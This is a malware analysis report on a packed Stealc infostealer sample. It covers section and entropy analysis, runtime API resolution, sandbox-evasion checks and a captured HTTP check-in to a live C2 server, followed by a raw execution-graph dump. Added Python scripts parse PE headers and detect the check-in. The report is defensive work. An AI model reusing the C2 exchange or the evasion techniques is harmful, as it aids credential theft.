                                  Section layout notes: five of the seven sections are mapped read/write/execute, two carry no name at all and two carry random eight-letter names (iuotgoma, ujumrvwn). The first unnamed section reserves 0x2e7000 bytes of virtual space for 0x67600 bytes on disk and the second reserves 0x2a2000 bytes for 0x200 on disk, i.e. room for code that is written at runtime; iuotgoma holds 0x19c600 bytes (about 1.6 MB of the 2.1 MB file) at an entropy of 7.95, which is what compressed or encrypted payload data looks like. The .rsrc section is empty (the MD5 is that of zero bytes). The .taggant section is the marker left by packers that implement the IEEE Software Taggant System. No section is named .text, so the entry point necessarily lies in a non-standard section.
                                  DLL | Import
                                  kernel32.dll | lstrcpy
                                  The import table names a single function. Every other API is resolved at runtime: the execution graph below walks the PEB (GetPEB), calls LoadLibraryA five times and then GetProcAddress repeatedly before the first real work is done, so static import analysis of this file says almost nothing about its capabilities.
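The section and import tables above are the part of the static view that survives packing, so they are worth checking programmatically. The following Python is an added example, not code from the report or from Joe Sandbox: it packs the section values listed in the table into raw IMAGE_SECTION_HEADER records (constructed here; raw file offsets are not in the report and are assumed to run back to back), parses them again with `struct`, and applies the packer-style checks a triage script would run: RWX sections, non-standard names, virtual size far above raw size, near-8.0 entropy, and an entry point outside the standard sections. The entry RVA used is the first node of the report's execution graph (0xc96c90) minus the image base (0xc80000), which is an assumption made for the demonstration. The entropy function is shown on constructed data because the section bytes themselves are not on the page; the report's entropy values are passed in for the triage step.

```python
import math
import struct

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# Names a stock MSVC link emits; anything else deserves a second look.
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".bss", ".tls", ".CRT"}

# IMAGE_SECTION_HEADER: Name[8], VirtualSize, VirtualAddress, SizeOfRawData,
# PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics (40 bytes).
SECTION_HEADER_FMT = "<8sIIIIIIHHI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pack_section_header(name, vsize, vaddr, rawsize, rawptr, characteristics):
    """Serialise one section header (used here only to construct the sample input)."""
    return struct.pack(SECTION_HEADER_FMT, name.encode("latin-1").ljust(8, b"\0"),
                       vsize, vaddr, rawsize, rawptr, 0, 0, 0, 0, characteristics)


def parse_section_headers(blob: bytes, count: int) -> list:
    """Parse `count` consecutive IMAGE_SECTION_HEADER records from offset 0 of `blob`."""
    sections = []
    for i in range(count):
        fields = struct.unpack_from(SECTION_HEADER_FMT, blob, i * SECTION_HEADER_SIZE)
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, chars = fields
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vsize": vsize,
                         "vaddr": vaddr, "rawsize": rawsize, "rawptr": rawptr,
                         "characteristics": chars})
    return sections


def section_for_rva(sections: list, rva: int):
    """Return the section whose virtual range covers `rva`, or None."""
    for s in sections:
        if s["vaddr"] <= rva < s["vaddr"] + s["vsize"]:
            return s
    return None


def triage(sections: list, entry_rva: int, entropy_by_name: dict) -> list:
    """Return (section label, reason) pairs for traits typical of a packed PE."""
    findings = []
    for s in sections:
        label = s["name"] or "<unnamed>"
        if (s["characteristics"] & RWX) == RWX:
            findings.append((label, "RWX"))
        if s["name"] not in STANDARD_NAMES:
            findings.append((label, "non-standard name"))
        # Big virtual size, little data on disk: space reserved for a runtime unpack.
        if s["vsize"] >= 0x10000 and s["vsize"] > 4 * s["rawsize"]:
            findings.append((label, "virtual size far exceeds raw size"))
        if entropy_by_name.get(s["name"], 0.0) >= 7.5:
            findings.append((label, "high entropy (packed or encrypted)"))
    ep = section_for_rva(sections, entry_rva)
    if ep is None or ep["name"] not in STANDARD_NAMES:
        label = "<none>" if ep is None else (ep["name"] or "<unnamed>")
        findings.append((label, "entry point outside standard sections"))
    return findings


# Values copied from the report's section table; raw offsets are assumed (not in the report).
_RWX_DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | RWX
_RW_DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
REPORT_SECTIONS = [  # (name, VirtualSize, VirtualAddress, SizeOfRawData, Characteristics)
    ("",         0x2e7000, 0x001000, 0x067600, _RWX_DATA),
    (".rsrc",    0x001000, 0x2e8000, 0x000000, _RW_DATA),
    (".idata",   0x001000, 0x2e9000, 0x000200, _RW_DATA),
    ("",         0x2a2000, 0x2ea000, 0x000200, _RWX_DATA),
    ("iuotgoma", 0x19d000, 0x58c000, 0x19c600, _RWX_DATA),
    ("ujumrvwn", 0x001000, 0x729000, 0x000400, _RWX_DATA),
    (".taggant", 0x003000, 0x72a000, 0x002200, _RWX_DATA),
]
REPORT_ENTROPY = {".rsrc": 0.0, ".idata": 0.895, "iuotgoma": 7.955,
                  "ujumrvwn": 6.182, ".taggant": 0.779}
DEMO_ENTRY_RVA = 0x16c90  # 0xc96c90 - imagebase 0xc80000 (assumption, see lead-in)


def build_report_blob() -> bytes:
    blob, rawptr = b"", 0x400
    for name, vsize, vaddr, rawsize, chars in REPORT_SECTIONS:
        blob += pack_section_header(name, vsize, vaddr, rawsize, rawptr, chars)
        rawptr += rawsize
    return blob


def demo() -> list:
    sections = parse_section_headers(build_report_blob(), len(REPORT_SECTIONS))
    return triage(sections, DEMO_ENTRY_RVA, REPORT_ENTROPY)


if __name__ == "__main__":
    for label, reason in demo():
        print(f"{label:10} {reason}")
```

On a real file the same `parse_section_headers` call is pointed at `e_lfanew + 24 + SizeOfOptionalHeader` with `NumberOfSections` from the file header, and `shannon_entropy` is run on each section's raw bytes instead of the report's numbers; the thresholds (7.5 bits, 4x virtual-to-raw ratio, 64 KiB minimum) are our own triage choices, not values from the report.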
                                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                  2024-10-29T20:43:17.658007+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
                                  The alert timestamp coincides with the end of the POST/response exchange in the HTTP session below, i.e. the rule matched the check-in request to the .php gate, not the initial GET /.
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Oct 29, 2024 20:43:16.445331097 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                  Oct 29, 2024 20:43:16.452004910 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                  Oct 29, 2024 20:43:16.452100039 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                  Oct 29, 2024 20:43:16.452274084 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                  Oct 29, 2024 20:43:16.458726883 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                  Oct 29, 2024 20:43:17.367207050 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                  Oct 29, 2024 20:43:17.367336988 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                  Oct 29, 2024 20:43:17.370271921 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                  Oct 29, 2024 20:43:17.375947952 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                  Oct 29, 2024 20:43:17.657844067 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
                                  Oct 29, 2024 20:43:17.658006907 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                  Oct 29, 2024 20:43:19.554992914 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                  • 185.215.113.206
                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 3624 | C:\Users\user\Desktop\file.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Oct 29, 2024 20:43:16.452274084 CET | 90 | OUT
                                  GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Oct 29, 2024 20:43:17.367207050 CET | 203 | IN
                                  HTTP/1.1 200 OK
                                  Date: Tue, 29 Oct 2024 19:43:17 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 29, 2024 20:43:17.370271921 CET | 413 | OUT
                                  POST /6c4adf523b719729.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCG
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 45 41 42 45 43 46 38 41 39 34 32 31 33 38 31 30 34 36 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a
                                  Data Ascii (CRLF line endings restored from the 0d 0a pairs above):
                                  ------HDGCFHIDAKECFHIEBFCG
                                  Content-Disposition: form-data; name="hwid"

                                  2DEABECF8A942138104604
                                  ------HDGCFHIDAKECFHIEBFCG
                                  Content-Disposition: form-data; name="build"

                                  tale
                                  ------HDGCFHIDAKECFHIEBFCG--
                                  Oct 29, 2024 20:43:17.657844067 CET | 210 | IN
                                  HTTP/1.1 200 OK
                                  Date: Tue, 29 Oct 2024 19:43:17 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s= (base64 for "block")
                                  Reading the exchange: the client first probes the server with a bare GET / (answered with an empty 200), then registers with a multipart POST to the .php gate that carries only two fields, a hardware identifier (hwid, 2DEABECF8A942138104604) and a build tag (build, tale). The 211-byte Content-Length matches the body exactly, so the hex dump is complete. The gate replied with the single base64 token "block" rather than a configuration, and no further HTTP requests appear in this session (the process has exited by the end of the analysis), so the stealer's collection output, if any, was never transmitted here; the server-side decision to block a given hwid is why a second detonation of the same sample can look "clean" on the network.
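The check-in above is small enough to decode by hand, but a pcap extractor or proxy-log parser needs it in code. The following Python is an added example, not code from the report or from Stealc: it rebuilds the captured POST body from the Data Ascii with its CRLFs restored (a transcription of the capture, not new data), splits the multipart/form-data body into its hwid and build fields with a minimal RFC 2046 parser, verifies the reconstruction against the Content-Length the client sent, and base64-decodes the 8-byte reply from its Data Raw hex. The `looks_like_stealc_checkin` heuristic at the end is our own shape-based triage check for HTTP logs and is not the logic of Suricata rule 2044243.

```python
import base64
import re

BOUNDARY = "----HDGCFHIDAKECFHIEBFCG"  # boundary= value from the captured Content-Type
CRLF = "\r\n"

# Body of the captured POST /6c4adf523b719729.php, rebuilt from the report's
# Data Ascii with the CRLFs (0d 0a in Data Raw) restored.
CAPTURED_POST_BODY = (
    f"--{BOUNDARY}{CRLF}"
    f'Content-Disposition: form-data; name="hwid"{CRLF}{CRLF}'
    f"2DEABECF8A942138104604{CRLF}"
    f"--{BOUNDARY}{CRLF}"
    f'Content-Disposition: form-data; name="build"{CRLF}{CRLF}'
    f"tale{CRLF}"
    f"--{BOUNDARY}--{CRLF}"
).encode()
CAPTURED_CONTENT_LENGTH = 211            # Content-Length header the client sent
CAPTURED_REPLY_HEX = "596d78765932733d"  # Data Raw of the 8-byte 200 OK body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Split a multipart/form-data body into {field name: raw value bytes}.

    Minimal RFC 2046 handling: parts are separated by CRLF + "--boundary", the
    first delimiter has no leading CRLF, and the closing delimiter ends in "--".
    """
    delim = b"--" + boundary.encode()
    crlf = CRLF.encode()
    _, found, rest = body.partition(delim)
    if not found:
        raise ValueError("boundary not found in body")
    fields = {}
    for part in rest.split(crlf + delim):
        if part.startswith(b"--"):            # closing delimiter reached
            break
        if not part.startswith(crlf):
            raise ValueError("malformed part")
        raw_headers, _, value = part[2:].partition(crlf + crlf)
        m = re.search(rb'name="([^"]*)"', raw_headers)
        if not m:
            raise ValueError("part without a field name")
        fields[m.group(1).decode()] = value
    return fields


def decode_reply(reply_hex: str) -> str:
    """The gate answers with a base64 token; return it decoded."""
    return base64.b64decode(bytes.fromhex(reply_hex), validate=True).decode()


def looks_like_stealc_checkin(method: str, path: str, content_type: str, body: bytes) -> bool:
    """Our own triage heuristic, not the IDS rule: multipart POST to a .php path,
    boundary of dashes plus exactly 20 uppercase letters, fields hwid and build only."""
    if method != "POST" or not path.endswith(".php"):
        return False
    m = re.search(r'boundary=(?:"([^"]+)"|([^;\s]+))', content_type)
    if not m:
        return False
    boundary = m.group(1) or m.group(2)
    if not re.fullmatch(r"-*[A-Z]{20}", boundary):
        return False
    try:
        fields = parse_multipart(body, boundary)
    except ValueError:
        return False
    return set(fields) == {"hwid", "build"}


def decode_capture() -> dict:
    """Run the captured exchange through the helpers above and summarise it."""
    if len(CAPTURED_POST_BODY) != CAPTURED_CONTENT_LENGTH:
        raise ValueError("reconstructed body does not match Content-Length")
    fields = parse_multipart(CAPTURED_POST_BODY, BOUNDARY)
    return {
        "hwid": fields["hwid"].decode(),
        "build": fields["build"].decode(),
        "reply": decode_reply(CAPTURED_REPLY_HEX),
        "flagged": looks_like_stealc_checkin(
            "POST", "/6c4adf523b719729.php",
            f"multipart/form-data; boundary={BOUNDARY}", CAPTURED_POST_BODY),
    }


if __name__ == "__main__":
    print(decode_capture())
```

The heuristic deliberately keys on the shape of the request (two-field multipart, all-uppercase boundary, .php gate) rather than on the hwid, build name or IP, which change per campaign; treat a hit as a reason to pull the full session, and expect the reply word to vary, since "block" is the gate refusing this client rather than the normal configuration response.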



                                  Target ID: 0
                                  Start time: 15:43:11
                                  Start date: 29/10/2024
                                  Path: C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit): true
                                  Commandline: "C:\Users\user\Desktop\file.exe"
                                  Imagebase: 0xc80000
                                  File size: 2'127'360 bytes
                                  MD5 hash: 264DAA04DEFC6B3CB7CD8B682DB05ACD
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2061051331.0000000005370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation: low
                                  Has exited: true


                                    Execution Graph

                                    Execution Coverage:3%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.5%
                                    Total number of Nodes:1327
                                    Total number of Limit Nodes:24
                                    execution_graph (the interactive node/edge dump does not survive extraction; the call chains that can be read from the edges are kept below, in graph order, with addresses as printed)
                                    • Root c96c90 → c822a0, which calls c84610 (RtlAllocateHeap at c84621, then VirtualProtect at c84671) about forty times in a row (c822b4 … c826ce); c826f0 repeats the same pattern for well over a hundred further call sites (c82704 … c83aa5). A heap allocation followed by a page-protection change per call site is the runtime decryption that rewrites section rights.
                                    • API resolution: c99bb0 → c99aa0 GetPEB → c99de3 LoadLibraryA ×5, then GetProcAddress at c99e44, c99e66 (×2), c99e9f, c99ec1 and c99ee2 (×2) → c96ca0 → c9aa50 lstrcpy. The whole API table is built by hand, which is why the import directory lists only lstrcpy.
                                    • Environment checks, each with an ExitProcess branch: c811d0 (c8120f ExitProcess | c81217) → c81160 GetSystemInfo (c8117c ExitProcess | c81184) → c81110 GetCurrentProcess, VirtualAllocExNuma (c81141 ExitProcess | c81149) → c810a0 VirtualAlloc, VirtualFree → c81220 → c98b40 → c81233 GlobalMemoryStatusEx → c81249 __aulldiv (c81292 ExitProcess | c8129a) → c96a10 GetUserDefaultLangID → c96a32, which has five separate ExitProcess exits (c96a43, c96a4d, c96a57, c96a61, c96a6b) before continuing at c96a73.
                                    • Host fingerprint: c81190 → c97a70 (3 API calls) → c8119e → c811cc, or via c979e0 (3 API calls) → c811b7 with c811c4 ExitProcess on the failing branch; then c979e0 GetProcessHeap, RtlAllocateHeap, GetUserNameA → c96cd0 → c97a70 GetProcessHeap, RtlAllocateHeap, GetComputerNameA → c96ce3 → c9acc0 (lstrlen, then lstrcpy and lstrcat) ×5 → c9abb0 lstrcpy → c96d29.
                                    • Event gate: c96d62 OpenEventA, then either c96d95 CloseHandle, Sleep → c96daa and back to c96d29 (a wait-and-retry loop while the event can be opened), or c96d79 → c96d81 CreateEventA → c96dac.
                                    • Date check: c96bc0 GetSystemTime → c96ac0 (string assembly through c9acc0/c9abb0 lstrcpy chains) → c96c38 sscanf → c9ab10 → c96c4a SystemTimeToFileTime ×2 → c96c6e, from where one branch is c96c78 ExitProcess and the other c96c80 → c95d60. The current time is compared with a date parsed out of a string, and the sample terminates on one side of the comparison.
                                    • Collection stage: c95d60 → c9aa50 lstrcpy → c9ab30 (lstrlen, lstrcpy) ×8 with c96680 (lstrcpy ×4) in between → c95e49 → c826f0 (the decryption loop above) → c95f13 … c95fee → c97690 GetWindowsDirectoryA → c848d0 → c919f0 → then, each step prefixed by c9aa50/c81590 lstrcpy, the large routines c859b0 (34 API calls, ctype), c91280 (lstrlen, lstrcpy), c90fc0 (StrCmpCA ×3, lstrlen, lstrcpy), c91170 (StrCmpCA, lstrlen, lstrcpy), c91c60 (115 API calls), c85000 (7 API calls), c908a0 (286 API calls), c913c0 (StrCmpCA, lstrlen, lstrcpy), c81ec0 (59 API calls), c937b0 (31 API calls), c91520 (19 API calls, ctype), c94010 (67 API calls), c94300 (57 API calls, 2 library calls), c949d0 (88 API calls, ctype), c94e00 (61 API calls, ctype), c94fc0 (65 API calls), c95190 (63 API calls, ctype), c87770 (108 API calls, ctype), c952a0 (61 API calls, ctype), c991a0 (46 API calls, ctype), c968d0 (9 API calls, ctype).
                                    • End: c96588 → c96db6 CloseHandle, ExitProcess.
38548 c84610 2 API calls 38547->38548 38549 c83abe 38548->38549 38550 c84610 2 API calls 38549->38550 38551 c83ad7 38550->38551 38552 c84610 2 API calls 38551->38552 38553 c83af0 38552->38553 38554 c84610 2 API calls 38553->38554 38555 c83b09 38554->38555 38556 c84610 2 API calls 38555->38556 38557 c83b22 38556->38557 38558 c84610 2 API calls 38557->38558 38559 c83b3b 38558->38559 38560 c84610 2 API calls 38559->38560 38561 c83b54 38560->38561 38562 c84610 2 API calls 38561->38562 38563 c83b6d 38562->38563 38564 c84610 2 API calls 38563->38564 38565 c83b86 38564->38565 38566 c84610 2 API calls 38565->38566 38567 c83b9f 38566->38567 38568 c84610 2 API calls 38567->38568 38569 c83bb8 38568->38569 38570 c84610 2 API calls 38569->38570 38571 c83bd1 38570->38571 38572 c84610 2 API calls 38571->38572 38573 c83bea 38572->38573 38574 c84610 2 API calls 38573->38574 38575 c83c03 38574->38575 38576 c84610 2 API calls 38575->38576 38577 c83c1c 38576->38577 38578 c84610 2 API calls 38577->38578 38579 c83c35 38578->38579 38580 c84610 2 API calls 38579->38580 38581 c83c4e 38580->38581 38582 c84610 2 API calls 38581->38582 38583 c83c67 38582->38583 38584 c84610 2 API calls 38583->38584 38585 c83c80 38584->38585 38586 c84610 2 API calls 38585->38586 38587 c83c99 38586->38587 38588 c84610 2 API calls 38587->38588 38589 c83cb2 38588->38589 38590 c84610 2 API calls 38589->38590 38591 c83ccb 38590->38591 38592 c84610 2 API calls 38591->38592 38593 c83ce4 38592->38593 38594 c84610 2 API calls 38593->38594 38595 c83cfd 38594->38595 38596 c84610 2 API calls 38595->38596 38597 c83d16 38596->38597 38598 c84610 2 API calls 38597->38598 38599 c83d2f 38598->38599 38600 c84610 2 API calls 38599->38600 38601 c83d48 38600->38601 38602 c84610 2 API calls 38601->38602 38603 c83d61 38602->38603 38604 c84610 2 API calls 38603->38604 38605 c83d7a 38604->38605 38606 c84610 2 API calls 38605->38606 38607 c83d93 38606->38607 38608 c84610 2 API calls 38607->38608 38609 c83dac 38608->38609 38610 c84610 2 
API calls 38609->38610 38611 c83dc5 38610->38611 38612 c84610 2 API calls 38611->38612 38613 c83dde 38612->38613 38614 c84610 2 API calls 38613->38614 38615 c83df7 38614->38615 38616 c84610 2 API calls 38615->38616 38617 c83e10 38616->38617 38618 c84610 2 API calls 38617->38618 38619 c83e29 38618->38619 38620 c84610 2 API calls 38619->38620 38621 c83e42 38620->38621 38622 c84610 2 API calls 38621->38622 38623 c83e5b 38622->38623 38624 c84610 2 API calls 38623->38624 38625 c83e74 38624->38625 38626 c84610 2 API calls 38625->38626 38627 c83e8d 38626->38627 38628 c84610 2 API calls 38627->38628 38629 c83ea6 38628->38629 38630 c84610 2 API calls 38629->38630 38631 c83ebf 38630->38631 38632 c84610 2 API calls 38631->38632 38633 c83ed8 38632->38633 38634 c84610 2 API calls 38633->38634 38635 c83ef1 38634->38635 38636 c84610 2 API calls 38635->38636 38637 c83f0a 38636->38637 38638 c84610 2 API calls 38637->38638 38639 c83f23 38638->38639 38640 c84610 2 API calls 38639->38640 38641 c83f3c 38640->38641 38642 c84610 2 API calls 38641->38642 38643 c83f55 38642->38643 38644 c84610 2 API calls 38643->38644 38645 c83f6e 38644->38645 38646 c84610 2 API calls 38645->38646 38647 c83f87 38646->38647 38648 c84610 2 API calls 38647->38648 38649 c83fa0 38648->38649 38650 c84610 2 API calls 38649->38650 38651 c83fb9 38650->38651 38652 c84610 2 API calls 38651->38652 38653 c83fd2 38652->38653 38654 c84610 2 API calls 38653->38654 38655 c83feb 38654->38655 38656 c84610 2 API calls 38655->38656 38657 c84004 38656->38657 38658 c84610 2 API calls 38657->38658 38659 c8401d 38658->38659 38660 c84610 2 API calls 38659->38660 38661 c84036 38660->38661 38662 c84610 2 API calls 38661->38662 38663 c8404f 38662->38663 38664 c84610 2 API calls 38663->38664 38665 c84068 38664->38665 38666 c84610 2 API calls 38665->38666 38667 c84081 38666->38667 38668 c84610 2 API calls 38667->38668 38669 c8409a 38668->38669 38670 c84610 2 API calls 38669->38670 38671 c840b3 38670->38671 38672 c84610 2 API calls 
38671->38672 38673 c840cc 38672->38673 38674 c84610 2 API calls 38673->38674 38675 c840e5 38674->38675 38676 c84610 2 API calls 38675->38676 38677 c840fe 38676->38677 38678 c84610 2 API calls 38677->38678 38679 c84117 38678->38679 38680 c84610 2 API calls 38679->38680 38681 c84130 38680->38681 38682 c84610 2 API calls 38681->38682 38683 c84149 38682->38683 38684 c84610 2 API calls 38683->38684 38685 c84162 38684->38685 38686 c84610 2 API calls 38685->38686 38687 c8417b 38686->38687 38688 c84610 2 API calls 38687->38688 38689 c84194 38688->38689 38690 c84610 2 API calls 38689->38690 38691 c841ad 38690->38691 38692 c84610 2 API calls 38691->38692 38693 c841c6 38692->38693 38694 c84610 2 API calls 38693->38694 38695 c841df 38694->38695 38696 c84610 2 API calls 38695->38696 38697 c841f8 38696->38697 38698 c84610 2 API calls 38697->38698 38699 c84211 38698->38699 38700 c84610 2 API calls 38699->38700 38701 c8422a 38700->38701 38702 c84610 2 API calls 38701->38702 38703 c84243 38702->38703 38704 c84610 2 API calls 38703->38704 38705 c8425c 38704->38705 38706 c84610 2 API calls 38705->38706 38707 c84275 38706->38707 38708 c84610 2 API calls 38707->38708 38709 c8428e 38708->38709 38710 c84610 2 API calls 38709->38710 38711 c842a7 38710->38711 38712 c84610 2 API calls 38711->38712 38713 c842c0 38712->38713 38714 c84610 2 API calls 38713->38714 38715 c842d9 38714->38715 38716 c84610 2 API calls 38715->38716 38717 c842f2 38716->38717 38718 c84610 2 API calls 38717->38718 38719 c8430b 38718->38719 38720 c84610 2 API calls 38719->38720 38721 c84324 38720->38721 38722 c84610 2 API calls 38721->38722 38723 c8433d 38722->38723 38724 c84610 2 API calls 38723->38724 38725 c84356 38724->38725 38726 c84610 2 API calls 38725->38726 38727 c8436f 38726->38727 38728 c84610 2 API calls 38727->38728 38729 c84388 38728->38729 38730 c84610 2 API calls 38729->38730 38731 c843a1 38730->38731 38732 c84610 2 API calls 38731->38732 38733 c843ba 38732->38733 38734 c84610 2 API calls 38733->38734 
38735 c843d3 38734->38735 38736 c84610 2 API calls 38735->38736 38737 c843ec 38736->38737 38738 c84610 2 API calls 38737->38738 38739 c84405 38738->38739 38740 c84610 2 API calls 38739->38740 38741 c8441e 38740->38741 38742 c84610 2 API calls 38741->38742 38743 c84437 38742->38743 38744 c84610 2 API calls 38743->38744 38745 c84450 38744->38745 38746 c84610 2 API calls 38745->38746 38747 c84469 38746->38747 38748 c84610 2 API calls 38747->38748 38749 c84482 38748->38749 38750 c84610 2 API calls 38749->38750 38751 c8449b 38750->38751 38752 c84610 2 API calls 38751->38752 38753 c844b4 38752->38753 38754 c84610 2 API calls 38753->38754 38755 c844cd 38754->38755 38756 c84610 2 API calls 38755->38756 38757 c844e6 38756->38757 38758 c84610 2 API calls 38757->38758 38759 c844ff 38758->38759 38760 c84610 2 API calls 38759->38760 38761 c84518 38760->38761 38762 c84610 2 API calls 38761->38762 38763 c84531 38762->38763 38764 c84610 2 API calls 38763->38764 38765 c8454a 38764->38765 38766 c84610 2 API calls 38765->38766 38767 c84563 38766->38767 38768 c84610 2 API calls 38767->38768 38769 c8457c 38768->38769 38770 c84610 2 API calls 38769->38770 38771 c84595 38770->38771 38772 c84610 2 API calls 38771->38772 38773 c845ae 38772->38773 38774 c84610 2 API calls 38773->38774 38775 c845c7 38774->38775 38776 c84610 2 API calls 38775->38776 38777 c845e0 38776->38777 38778 c84610 2 API calls 38777->38778 38779 c845f9 38778->38779 38780 c99f20 38779->38780 38781 c99f30 43 API calls 38780->38781 38782 c9a346 8 API calls 38780->38782 38781->38782 38783 c9a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38782->38783 38784 c9a456 38782->38784 38783->38784 38785 c9a463 8 API calls 38784->38785 38786 c9a526 38784->38786 38785->38786 38787 c9a5a8 38786->38787 38788 c9a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38786->38788 38789 c9a5b5 6 API calls 38787->38789 38790 c9a647 38787->38790 38788->38787 38789->38790 38791 c9a72f 
38790->38791 38792 c9a654 9 API calls 38790->38792 38793 c9a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38791->38793 38794 c9a7b2 38791->38794 38792->38791 38793->38794 38795 c9a7bb GetProcAddress GetProcAddress 38794->38795 38796 c9a7ec 38794->38796 38795->38796 38797 c9a825 38796->38797 38798 c9a7f5 GetProcAddress GetProcAddress 38796->38798 38799 c9a922 38797->38799 38800 c9a832 10 API calls 38797->38800 38798->38797 38801 c9a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38799->38801 38802 c9a98d 38799->38802 38800->38799 38801->38802 38803 c9a9ae 38802->38803 38804 c9a996 GetProcAddress 38802->38804 38805 c95ef3 38803->38805 38806 c9a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38803->38806 38804->38803 38807 c81590 38805->38807 38806->38805 39077 c816b0 38807->39077 38810 c9aab0 lstrcpy 38811 c815b5 38810->38811 38812 c9aab0 lstrcpy 38811->38812 38813 c815c7 38812->38813 38814 c9aab0 lstrcpy 38813->38814 38815 c815d9 38814->38815 38816 c9aab0 lstrcpy 38815->38816 38817 c81663 38816->38817 38818 c95760 38817->38818 38819 c95771 38818->38819 38820 c9ab30 2 API calls 38819->38820 38821 c9577e 38820->38821 38822 c9ab30 2 API calls 38821->38822 38823 c9578b 38822->38823 38824 c9ab30 2 API calls 38823->38824 38825 c95798 38824->38825 38826 c9aa50 lstrcpy 38825->38826 38827 c957a5 38826->38827 38828 c9aa50 lstrcpy 38827->38828 38829 c957b2 38828->38829 38830 c9aa50 lstrcpy 38829->38830 38831 c957bf 38830->38831 38832 c9aa50 lstrcpy 38831->38832 38872 c957cc 38832->38872 38833 c9aab0 lstrcpy 38833->38872 38834 c9aa50 lstrcpy 38834->38872 38835 c95893 StrCmpCA 38835->38872 38836 c958f0 StrCmpCA 38837 c95a2c 38836->38837 38836->38872 38838 c9abb0 lstrcpy 38837->38838 38839 c95a38 38838->38839 38840 c9ab30 2 API calls 38839->38840 38842 c95a46 38840->38842 38841 